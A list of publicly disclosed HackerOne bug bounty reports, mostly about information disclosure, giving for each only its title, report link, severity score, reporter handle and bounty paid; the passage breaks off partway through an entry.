Title\nUninitialized server memory disclosure via ImageMagick gif parser\n#### URL \nhttps://hackerone.com/reports/284155\n#### Severity score\nnull\n#### Reporter \nchaosbolt\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\nhttps://rpm.newrelic.com/.htaccess file is world readable\n#### URL \nhttps://hackerone.com/reports/123074\n#### Severity score\nnull\n#### Reporter \ngeeknik\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nCustomer private program can disclose email any users through invited via username\n#### URL \nhttps://hackerone.com/reports/807448\n#### Severity score\n7.5\n#### Reporter \nhaxta4ok00\n### Bounty paid\n$7,500\n\n\n---\n\n\n### Title\nDefault /docs folder of PHPBB3 installation on gamesnet.yahoo.com\n#### URL \nhttps://hackerone.com/reports/17506\n#### Severity score\nnull\n#### Reporter \nmarch\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nFetching external resources through svg images\n#### URL \nhttps://hackerone.com/reports/142709\n#### Severity score\nnull\n#### Reporter \ndetroitsmash\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nCVE-2017-15277 on Profile page\n#### URL \nhttps://hackerone.com/reports/315906\n#### Severity score\nnull\n#### Reporter \nemitrani\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nDisclosure of Github Issues\n#### URL \nhttps://hackerone.com/reports/425719\n#### Severity score\n6.1\n#### Reporter \nrijalrojan\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\n(m.mail.ru) Password type input with auto-complete enabled \n#### URL \nhttps://hackerone.com/reports/13200\n#### Severity score\nnull\n#### Reporter \nvineet\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nLeak Sensetive Data at face.city-mobil.ru\n#### URL \nhttps://hackerone.com/reports/756879\n#### Severity score\n6.1\n#### Reporter \nr0hack\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nAn invite-only's program submission state is accessible to users no longer part of the program\n#### URL \nhttps://hackerone.com/reports/800109\n#### Severity score\n3.8\n#### Reporter \nd4rk_g1rl\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nToken leakage by referrer\n#### URL \nhttps://hackerone.com/reports/213936\n#### Severity score\nnull\n#### Reporter \nmostafamamdoh\n### Bounty paid\n$60\n\n\n---\n\n\n### Title\nWordPress User Enumeration - blog.newrelic.com\n#### URL \nhttps://hackerone.com/reports/115817\n#### Severity score\nnull\n#### Reporter \nniwasaki\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInternal server error 500 at log.veris.in \n#### URL \nhttps://hackerone.com/reports/157986\n#### Severity score\nnull\n#### Reporter \nak1t4\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPrivate Key exposed in Travis Log can Compromise all the test servers.\n#### URL \nhttps://hackerone.com/reports/638401\n#### Severity score\nnull\n#### Reporter \nhayageek\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nGraphQL node interface for ActiveResource models lacks encoding for resource identifier, enabling parameter injection in Payments backend\n#### URL \nhttps://hackerone.com/reports/800231\n#### Severity score\n6.1\n#### Reporter \njobert\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nVerbose SQL error messages\n#### URL \nhttps://hackerone.com/reports/20279\n#### Severity score\nnull\n#### Reporter \nbitquark\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSelecting encryption for email with drive attachment overrides the drive email password\n#### URL \nhttps://hackerone.com/reports/180037\n#### Severity score\nnull\n#### Reporter \nhaquaman\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nUnauthenticated 'display name' information leak on enumeration of login names\n#### URL \nhttps://hackerone.com/reports/237232\n#### Severity score\n5.3\n#### Reporter \nfrankspierings\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nThe request tells the number of private programs, the new system of authorization /invite/token\n#### URL \nhttps://hackerone.com/reports/310946\n#### Severity score\n4.3\n#### Reporter \nhaxta4ok00\n### Bounty paid\n$2,000\n\n\n---\n\n\n### Title\nUsing nmap revealing sensitive information \n#### URL \nhttps://hackerone.com/reports/18382\n#### Severity score\nnull\n#### Reporter \nvineet\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nOpen port leads to information disclosure\n#### URL \nhttps://hackerone.com/reports/223421\n#### Severity score\nnull\n#### Reporter \nstr33\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nProtected tweets exposure through the URL\n#### URL \nhttps://hackerone.com/reports/491473\n#### Severity score\nnull\n#### Reporter \nterjanq\n### Bounty paid\n$560\n\n\n---\n\n\n### Title\nUser credentials leak and arbitrary local file read/leak due to same-origin-policy violation\n#### URL \nhttps://hackerone.com/reports/136454\n#### Severity score\nnull\n#### Reporter \nbjornruytenberg\n### Bounty paid\n$3,000\n\n\n---\n\n\n### Title\nlert.uber.com: Few default folders/files of AURA Framework are accessible\n#### URL \nhttps://hackerone.com/reports/195205\n#### Severity score\nnull\n#### Reporter \nfiledescryptor\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nDevelopment configuration file\n#### URL \nhttps://hackerone.com/reports/231267\n#### Severity score\nnull\n#### Reporter \nprotector47\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nBash History file log\n#### URL \nhttps://hackerone.com/reports/671939\n#### Severity score\nnull\n#### Reporter \niframe\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nWordpress Users Disclosure (/wp-json/wp/v2/users/) on data.gov\n#### URL \nhttps://hackerone.com/reports/942481\n#### Severity score\nnull\n#### Reporter \nnagli\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPossibility to get private email using UUID\n#### URL \nhttps://hackerone.com/reports/127158\n#### Severity score\nnull\n#### Reporter \nshmoo\n### Bounty paid\n$5,000\n\n\n---\n\n\n### Title\nFlash Local Sandbox Bypass\n#### URL \nhttps://hackerone.com/reports/27651\n#### Severity score\nnull\n#### Reporter \nkinine\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nДоступ к администраторским faq \n#### URL \nhttps://hackerone.com/reports/370629\n#### Severity score\nnull\n#### Reporter \nexecutor\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nInsecure crossdomain.xml\n#### URL \nhttps://hackerone.com/reports/44652\n#### Severity score\nnull\n#### Reporter \nsmiegles\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nIncorrect logic in MySQL & MariaDB protocol leads to remote SSRF/Remote file read\n#### URL \nhttps://hackerone.com/reports/156511\n#### Severity score\nnull\n#### Reporter \nsquashbroom\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure in AWS S3 Bucket\n#### URL \nhttps://hackerone.com/reports/163476\n#### Severity score\nnull\n#### Reporter \nysx\n### Bounty paid\n$20\n\n\n---\n\n\n### Title\nUnResolved ChangeSet are Visible to Public That also Causes Information Disclosure\n#### URL \nhttps://hackerone.com/reports/282843\n#### Severity score\nnull\n#### Reporter \nhackerwahab\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nLine feed injection in get request leads AWS S3 Bucket information disclosure \n#### URL \nhttps://hackerone.com/reports/460928\n#### Severity score\n6.1\n#### Reporter \naty\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nKnow whether private project name exists or not within a group using link comments\n#### URL \nhttps://hackerone.com/reports/495497\n#### Severity score\nnull\n#### Reporter \nashish_r_padelkar\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nPublic and secret api key leaked via omise github repo(owned by omise)\n#### URL \nhttps://hackerone.com/reports/508024\n#### Severity score\nnull\n#### Reporter \nnoobwalid\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPII leakage due to scrceenshot of health records\n#### URL \nhttps://hackerone.com/reports/693933\n#### Severity score\nnull\n#### Reporter \nalyssa_herrera\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInsecure Local Data Storage : Application stores data using a binary sqlite database\n#### URL \nhttps://hackerone.com/reports/57918\n#### Severity score\nnull\n#### Reporter \nbugwrangler\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nSVN repository\n#### URL \nhttps://hackerone.com/reports/622113\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSAUCE Access_key and User_name leaked in Travis CI build logs\n#### URL \nhttps://hackerone.com/reports/238890\n#### Severity score\nnull\n#### Reporter \nan0n-j\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nApache Server-Status Detected\n#### URL \nhttps://hackerone.com/reports/247002\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFull path disclosure vulnerability at http://corporate.olx.ph\n#### URL \nhttps://hackerone.com/reports/171048\n#### Severity score\nnull\n#### Reporter \njuliocesar\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nLack of cross-origin request blocking allows leaking of sensitive information on several endpoints\n#### URL \nhttps://hackerone.com/reports/350739\n#### Severity score\nnull\n#### Reporter \nherrera\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nHackerone Email Addresses Enumeration\n#### URL \nhttps://hackerone.com/reports/2429\n#### Severity score\nnull\n#### Reporter \ntechintheprovince\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nHackerOne Private Programs users disclosure and de-anonymous-ize\n#### URL \nhttps://hackerone.com/reports/92716\n#### Severity score\nnull\n#### Reporter \nsymbiansymoh\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure through .DS_Store in ██████████\n#### URL \nhttps://hackerone.com/reports/142549\n#### Severity score\nnull\n#### Reporter \nlewerkun\n### Bounty paid\n$560\n\n\n---\n\n\n### Title\nBug Report \n#### URL \nhttps://hackerone.com/reports/142940\n#### Severity score\nnull\n#### Reporter \n1337_inj3c70r\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nStored credentials instantly autofilled within sandboxed iframes\n#### URL \nhttps://hackerone.com/reports/650085\n#### Severity score\nnull\n#### Reporter \nalesandroortiz\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nStarbucks China Android app cloud storage service leaks a credential.\n#### URL \nhttps://hackerone.com/reports/440629\n#### Severity score\nnull\n#### Reporter \nk3mlol\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nсервант статус\n#### URL \nhttps://hackerone.com/reports/452010\n#### Severity score\n0\n#### Reporter \nlinkks\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nCoinbase Android Application - Bitcoin Wallet Leaks OAuth Response Code\n#### URL \nhttps://hackerone.com/reports/5314\n#### Severity score\nnull\n#### Reporter \nprakharprasad\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\n[www.yoti.com] Wordpress user admin information discloure\n#### URL \nhttps://hackerone.com/reports/727870\n#### Severity score\nnull\n#### Reporter \nlamscun\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nPublic Github Repo Leaking Internal Credentials Leading To DiscoveryIQ Docker Access\n#### URL \nhttps://hackerone.com/reports/631348\n#### Severity score\nnull\n#### Reporter \nvinothkumar\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nGuests Will Disclose the Private Project Full Activity Via Project Activity Feeds\n#### URL \nhttps://hackerone.com/reports/491319\n#### Severity score\nnull\n#### Reporter \nuzkova\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[bot.brew.sh] Full Path Disclosure\n#### URL \nhttps://hackerone.com/reports/222096\n#### Severity score\n5.3\n#### Reporter \nzephrfish\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[sj.my.com] Source Code Disclosure /.svn/wc.db\n#### URL \nhttps://hackerone.com/reports/410789\n#### Severity score\nnull\n#### Reporter \nbobrov\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nEnumerating userIDs with phone numbers\n#### URL \nhttps://hackerone.com/reports/128723\n#### Severity score\nnull\n#### Reporter \nr0t1v\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nApplication error message\n#### URL \nhttps://hackerone.com/reports/147577\n#### Severity score\nnull\n#### Reporter \ndr_dragon\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nPrivate, embeddable videos leaks data through Facebook & Open Graph\n#### URL \nhttps://hackerone.com/reports/121919\n#### Severity score\nnull\n#### Reporter \ntomash\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nuninitilized server memory disclosure via ImageMagick in my.mail.ru and cloud.mail.ru\n#### URL \nhttps://hackerone.com/reports/251732\n#### Severity score\nnull\n#### Reporter \nneex\n### Bounty paid\n$750\n\n\n---\n\n\n### Title\nAndroid content provider exposes password-protected share password hashes\n#### URL \nhttps://hackerone.com/reports/242727\n#### Severity score\nnull\n#### Reporter \nicewater\n### Bounty paid\n$75\n\n\n---\n\n\n### Title\nLeaking password reset token via referrer from external Twitter share button\n#### URL \nhttps://hackerone.com/reports/244434\n#### Severity score\nnull\n#### Reporter \nprateek_0490\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation / sensitive data disclosure on some endpoints\n#### URL \nhttps://hackerone.com/reports/273726\n#### Severity score\nnull\n#### Reporter \neuropa\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nEmployee's GitHub Token Found In Travis CI Build Logs\n#### URL \nhttps://hackerone.com/reports/496937\n#### Severity score\nnull\n#### Reporter \nkarimpwnz\n### Bounty paid\n$5,000\n\n\n---\n\n\n### Title\nInternal IP Address Disclosed\n#### URL \nhttps://hackerone.com/reports/707228\n#### Severity score\nnull\n#### Reporter \nahmd_halabi\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nMisconfiguration in 2 factor allows sensitive data expose\n#### URL \nhttps://hackerone.com/reports/119129\n#### Severity score\nnull\n#### Reporter \ncodequick\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nApplication error message\n#### URL \nhttps://hackerone.com/reports/106384\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\n$20\n\n\n---\n\n\n### Title\nOpen FTP server on a DoD system\n#### URL \nhttps://hackerone.com/reports/192321\n#### Severity score\nnull\n#### Reporter \nalyssa_herrera\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPrivate partial disclosure of h1 infrastructure \n#### URL \nhttps://hackerone.com/reports/283361\n#### Severity score\n0\n#### Reporter \nexadmin\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAn “algobot”-s GitHub access token was leaked\n#### URL \nhttps://hackerone.com/reports/212067\n#### Severity score\nnull\n#### Reporter \nsainaen\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nPartial disclosure of Private Videos through data-mediabook attribute information leak\n#### URL \nhttps://hackerone.com/reports/228495\n#### Severity score\nnull\n#### Reporter \nsp1d3rs\n### Bounty paid\n$250\n\n\n---\n\n\n### Title\nDirectory traversal attack in view resolver\n#### URL \nhttps://hackerone.com/reports/3370\n#### Severity score\nnull\n#### Reporter \nlautis\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\nInformation Disclosure (can access all ███s) within ███████ view █████████ Portal\n#### URL \nhttps://hackerone.com/reports/484377\n#### Severity score\nnull\n#### Reporter \narchang31\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nTest Page available with Server details on /r/test (viestinta.lahitapiola.fi)\n#### URL \nhttps://hackerone.com/reports/201901\n#### Severity score\nnull\n#### Reporter \nyonm13\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nscfbp.tng.mail.ru: Heartbleed\n#### URL \nhttps://hackerone.com/reports/49139\n#### Severity score\nnull\n#### Reporter \nisox\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nInformation disclosure\n#### URL \nhttps://hackerone.com/reports/350432\n#### Severity score\n2.9\n#### Reporter \nb258ea62bf297b02afa9854\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUse of uninitialized value in ftp_getrc_msg method of mod_proxy_ftp.c\n#### URL \nhttps://hackerone.com/reports/838685\n#### Severity score\n3.7\n#### Reporter \nchamal\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\n[http://www.informatica.com]- info disclosure\n#### URL \nhttps://hackerone.com/reports/311058\n#### Severity score\nnull\n#### Reporter \nmodam3r5\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nGET request to accounts.json on support site leaks the root account license key and the browser license key to a restricted user\n#### URL \nhttps://hackerone.com/reports/479135\n#### Severity score\nnull\n#### Reporter \njon_bottarini\n### Bounty paid\n$750\n\n\n---\n\n\n### Title\nAccount hijacking possible through ADB backup feature\n#### URL \nhttps://hackerone.com/reports/12617\n#### Severity score\nnull\n#### Reporter \ntrotmaster\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\ngitlab-workhorse bypass in Gitlab::Middleware::Multipart allowing files in `allowed_paths` to be read\n#### URL \nhttps://hackerone.com/reports/850447\n#### Severity score\nnull\n#### Reporter \nvakzz\n### Bounty paid\n$10,000\n\n\n---\n\n\n### Title\nInformation disclosure (No rate limting in forgot password & other login)\n#### URL \nhttps://hackerone.com/reports/91343\n#### Severity score\nnull\n#### Reporter \nprotector47\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nAmazon Bucket Accessible (http://legalrobot.s3.amazonaws.com/)\n#### URL \nhttps://hackerone.com/reports/163599\n#### Severity score\nnull\n#### Reporter \ngorkhali\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nWordpress directories/files visible to internet\n#### URL \nhttps://hackerone.com/reports/785866\n#### Severity score\nnull\n#### Reporter \ntefa_\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nMalicious Server can force read any file on clients system with default configuration in MySQL Clients\n#### URL \nhttps://hackerone.com/reports/171593\n#### Severity score\nnull\n#### Reporter \ntarq\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure [ https://curious.ru/api/submissions ]\n#### URL \nhttps://hackerone.com/reports/703086\n#### Severity score\nnull\n#### Reporter \nelmahdi\n### Bounty paid\n$250\n\n\n---\n\n\n### Title\nSubmitted reports state logs leakage\n#### URL \nhttps://hackerone.com/reports/306733\n#### Severity score\nnull\n#### Reporter \n666reda\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure\n#### URL \nhttps://hackerone.com/reports/143064\n#### Severity score\nnull\n#### Reporter \nmugeesahmed\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nRequesting unknown file type returns Ruby object w/ address\n#### URL \nhttps://hackerone.com/reports/109420\n#### Severity score\nnull\n#### Reporter \nrun\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSecret API Key Leakage via Query String\n#### URL \nhttps://hackerone.com/reports/276041\n#### Severity score\nnull\n#### Reporter \nluckydivino\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nServer Side Browsing - localhost open port enumeration\n#### URL \nhttps://hackerone.com/reports/122697\n#### Severity score\nnull\n#### Reporter \naiacobelli\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUsers able to set video url for unpublished words and able to see the name of unpublished words\n#### URL \nhttps://hackerone.com/reports/486837\n#### Severity score\nnull\n#### Reporter \nd3f4u17\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nEXIF Geolocation Data Not Stripped From Uploaded Images\n#### URL \nhttps://hackerone.com/reports/615336\n#### Severity score\n2\n#### Reporter \nthe_predator\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nGain access to any user's email address\n#### URL \nhttps://hackerone.com/reports/42154\n#### Severity score\nnull\n#### Reporter \ncorb3nik\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nIDOR - Accessing other user's attachements via PUT /appsuite/api/files?action=saveAs\n#### URL \nhttps://hackerone.com/reports/204984\n#### Severity score\nnull\n#### Reporter \ninhibitor181\n### Bounty paid\n$888\n\n\n---\n\n\n### Title\nDisclosure of h1 challenges name through the calendar\n#### URL \nhttps://hackerone.com/reports/488643\n#### Severity score\n3.8\n#### Reporter \nrijalrojan\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nAbility to enumerate private programs using SAML\n#### URL \nhttps://hackerone.com/reports/167828\n#### Severity score\nnull\n#### Reporter \nayoubfathi_\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSecret_key in GitHub\n#### URL \nhttps://hackerone.com/reports/926093\n#### Severity score\nnull\n#### Reporter \nfr0gz0x\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure on inside.gratipay.com\n#### URL \nhttps://hackerone.com/reports/267213\n#### Severity score\nnull\n#### Reporter \nmalek\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUninitialized variable error message leaks information \n#### URL \nhttps://hackerone.com/reports/7915\n#### Severity score\nnull\n#### Reporter \nmelvin\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nastrumnival.com subdomain\n#### URL \nhttps://hackerone.com/reports/471941\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUser email enumuration using Gmail\n#### URL \nhttps://hackerone.com/reports/90308\n#### Severity score\nnull\n#### Reporter \npaulos_\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\ninformation disclosure\n#### URL \nhttps://hackerone.com/reports/13939\n#### Severity score\nnull\n#### Reporter \nniks\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nReflected XSS in https://www.█████/\n#### URL \nhttps://hackerone.com/reports/950700\n#### Severity score\nnull\n#### Reporter \nnirajgautamit\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nBrowser Self XSS Protection not implemented\n#### URL \nhttps://hackerone.com/reports/400781\n#### Severity score\nnull\n#### Reporter \nhallaleen\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[sputnik.mail.ru] Publicly accessible GIT directory\n#### URL \nhttps://hackerone.com/reports/239482\n#### Severity score\nnull\n#### Reporter \nbobrov\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\ns2.owncloud.com: SSL Session cookie without secure flag set\n#### URL \nhttps://hackerone.com/reports/83856\n#### Severity score\nnull\n#### Reporter \nashesh\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[h1-2006 CTF] Payments for May have been processed!\n#### URL \nhttps://hackerone.com/reports/894165\n#### Severity score\nnull\n#### Reporter \nvakzz\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nOld titles are not hidden in reports with limited disclosure\n#### URL \nhttps://hackerone.com/reports/144129\n#### Severity score\nnull\n#### Reporter \njthetechguy\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nStealing users' facebook access tokens - kitcrm.com\n#### URL \nhttps://hackerone.com/reports/211477\n#### Severity score\nnull\n#### Reporter \nzombiehelp54\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nArbitrary file read via ffmpeg HLS parser at https://www.flickr.com/photos/upload\n#### URL \nhttps://hackerone.com/reports/487008\n#### Severity score\n9.9\n#### Reporter \nasad0x01_\n### Bounty paid\n$2,000\n\n\n---\n\n\n### Title\nUsers enumeration is possible through cycling through recurring[client_id] argument value.\n#### URL \nhttps://hackerone.com/reports/152669\n#### Severity score\nnull\n#### Reporter \n0xamir\n### Bounty paid\n$350\n\n\n---\n\n\n### Title\nFlash Sandbox Bypass\n#### URL \nhttps://hackerone.com/reports/15362\n#### Severity score\nnull\n#### Reporter \nkinine\n### Bounty paid\n$3,000\n\n\n---\n\n\n### Title\nPotentially Sensitive Information on GitHub\n#### URL \nhttps://hackerone.com/reports/143438\n#### Severity score\nnull\n#### Reporter \nwkcaj\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\nWordpress: Directory Traversal / Denial of Serivce\n#### URL \nhttps://hackerone.com/reports/163421\n#### Severity score\nnull\n#### Reporter \ntbehroz\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation regarding trips from other users\n#### URL \nhttps://hackerone.com/reports/127161\n#### Severity score\nnull\n#### Reporter \nmaluko\n### Bounty paid\n$5,000\n\n\n---\n\n\n### Title\nBanner Grabbing - Apache Server Version Disclosure\n#### URL \nhttps://hackerone.com/reports/348801\n#### Severity score\nnull\n#### Reporter \nkistimat\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nlocal file disclosure via FFmpeg hls processing\n#### URL \nhttps://hackerone.com/reports/226756\n#### Severity score\nnull\n#### Reporter \nneex\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nEmail enumeration of users\n#### URL \nhttps://hackerone.com/reports/221869\n#### Severity score\nnull\n#### Reporter \npappan\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nLegal Robot AWS S3 Bucket Directory Listing\n#### URL \nhttps://hackerone.com/reports/194142\n#### Severity score\nnull\n#### Reporter \njapz\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nDisclosure of sensitive information through Google Cloud Storage bucket\n#### URL \nhttps://hackerone.com/reports/176013\n#### Severity score\nnull\n#### Reporter \nkoenrh\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nEmail address of any user can be queried on Report Invitation GraphQL type when username is known\n#### URL \nhttps://hackerone.com/reports/792927\n#### Severity score\n8.3\n#### Reporter \nmsdian7\n### Bounty paid\n$8,500\n\n\n---\n\n\n### Title\nFull Path Disclosure in password lock\n#### URL \nhttps://hackerone.com/reports/115422\n#### Severity score\nnull\n#### Reporter \nsupernatural\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUser Enumeration. \n#### URL \nhttps://hackerone.com/reports/165894\n#### Severity score\nnull\n#### Reporter \nleet-boy\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nOpen FTP on ███\n#### URL \nhttps://hackerone.com/reports/197976\n#### Severity score\nnull\n#### Reporter \nalyssa_herrera\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nnginx version disclosure on downloads.gratipay.com\n#### URL \nhttps://hackerone.com/reports/157507\n#### Severity score\nnull\n#### Reporter \nfootstep\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nThis Github Repository Seems Leaking \"nino.samokat.ru\" Source Code\n#### URL \nhttps://hackerone.com/reports/973658\n#### Severity score\nnull\n#### Reporter \ngevakun\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nFull Path Disclosure \n#### URL \nhttps://hackerone.com/reports/85201\n#### Severity score\nnull\n#### Reporter \nishahriyar\n### Bounty paid\n$25\n\n\n---\n\n\n### Title\nFull path Disclosure in Rockstargames.com██████████ \n#### URL \nhttps://hackerone.com/reports/210572\n#### Severity score\nnull\n#### Reporter \npappan\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nUser Enumeration and Information Disclosure\n#### URL \nhttps://hackerone.com/reports/155578\n#### Severity score\nnull\n#### Reporter \npl_bounty\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\napps.owncloud.com: Path Disclosure\n#### URL \nhttps://hackerone.com/reports/83801\n#### Severity score\nnull\n#### Reporter \nashesh\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nVerbose error message reveals internal system hostnames, protols and used ports (yrityspalvelu.tapiola.fi)\n#### URL \nhttps://hackerone.com/reports/294464\n#### Severity score\nnull\n#### Reporter \nmuon4\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nDirectory Listing of all the resource files of olx.com.eg \n#### URL \nhttps://hackerone.com/reports/175760\n#### Severity score\n5.3\n#### Reporter \nmohamedsherif\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSensitive Information disclosure Through Config File\n#### URL \nhttps://hackerone.com/reports/775123\n#### Severity score\nnull\n#### Reporter \na1c3venom\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAndroid SDK - CREATE_REQUEST broascast is unprotected\n#### URL \nhttps://hackerone.com/reports/180349\n#### Severity score\n6.8\n#### Reporter \nbagipro\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nPossible to View Driver Waybill via Driver UUID\n#### URL \nhttps://hackerone.com/reports/127087\n#### Severity score\nnull\n#### Reporter \nshmoo\n### Bounty paid\n$3,000\n\n\n---\n\n\n### Title\nChina – Limited Partner PII Regarding Work Scheduling via Unauthenticated API Endpoint\n#### URL \nhttps://hackerone.com/reports/659248\n#### Severity score\nnull\n#### Reporter \n0xpatrik\n### Bounty paid\n$4,000\n\n\n---\n\n\n### Title\nfiles likes of README.md is public\n#### URL \nhttps://hackerone.com/reports/31255\n#### Severity score\nnull\n#### Reporter \npulkit_pandey\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFile name/folder enumeration.\n#### URL \nhttps://hackerone.com/reports/35823\n#### Severity score\nnull\n#### Reporter \nnahamsec\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[https://life.informatica.com] - information disclose \n#### URL \nhttps://hackerone.com/reports/312292\n#### Severity score\nnull\n#### Reporter \nmodam3r5\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nMultiple sub domain are vulnerable because of leaking full path \n#### URL \nhttps://hackerone.com/reports/62778\n#### Severity score\nnull\n#### Reporter \ndigitalsurgn\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nUser guessing/enumeration at https://app.c2fo.com/api/password-reset\n#### URL \nhttps://hackerone.com/reports/5688\n#### Severity score\nnull\n#### Reporter \ninternetwache\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nExposing hackerone users personally identifiable information by abusing sandbox with swag reward enabled\n#### URL \nhttps://hackerone.com/reports/357576\n#### Severity score\nnull\n#### Reporter \njapz\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n██████ Authenticated User Data Disclosure\n#### URL \nhttps://hackerone.com/reports/587214\n#### Severity score\nnull\n#### Reporter \ndeputy\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAble to comment/view in others support ticket at https://en.instagram-brand.com/requests/dashboard\n#### URL \nhttps://hackerone.com/reports/1007988\n#### Severity score\nnull\n#### Reporter \najay_saycure\n### Bounty paid\n$200\n\n\n---\n\n\n### Title\nInformation disclosure vulnerability on a DoD website\n#### URL \nhttps://hackerone.com/reports/210525\n#### Severity score\nnull\n#### Reporter \ntwicedi\n### 